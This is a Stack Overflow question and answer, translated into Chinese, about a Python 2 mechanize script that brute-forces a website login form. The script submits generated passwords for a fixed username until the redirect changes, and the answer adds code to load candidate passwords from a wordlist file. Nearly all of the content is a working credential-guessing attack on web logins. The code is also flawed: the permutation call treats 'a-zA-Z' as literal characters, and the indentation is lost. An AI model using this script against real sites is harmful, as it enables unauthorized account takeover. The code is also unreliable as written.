我有一个Python脚本,它使用itertools强制执行web表单(登录)。
我该如何用load-passwords from-wordlist.txt特性来替换bruteforce/字典生成过程呢?
我的代码:
#!/usr/bin/python
import mechanize
import itertools
br = mechanize.Browser()
br.set_handle_equiv(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
combos = itertools.permutations("a-zA-Z",5)
r = br.open("http://example.com/login")
for x in combos:
br.select_form(nr = 0)
br.form['username'] = "my_username_123"
br.form['password'] = ''.join(x)
print "Checking ",br.form['password']
response = br.submit()
if response.geturl()!="http://example.com/login":
print "Correct password is ",''.join(x)
break
发布于 2016-06-21 21:28:22
可以添加类似这样的内容,以便如果命令行参数中存在密码文件,它将使用该文件而不是预定义的列表。
示例: python script.py password.txt
import sys
import os
if len(sys.argv) > 1:
if os.path.exists(sys.argv[1]):
combos = [line.strip() for line in open(sys.argv[1])]
else:
print "[-] File not found"
sys.exit(0)
else:
combos = itertools.permutations("a-zA-Z",5)
https://stackoverflow.com/questions/37947994
复制相似问题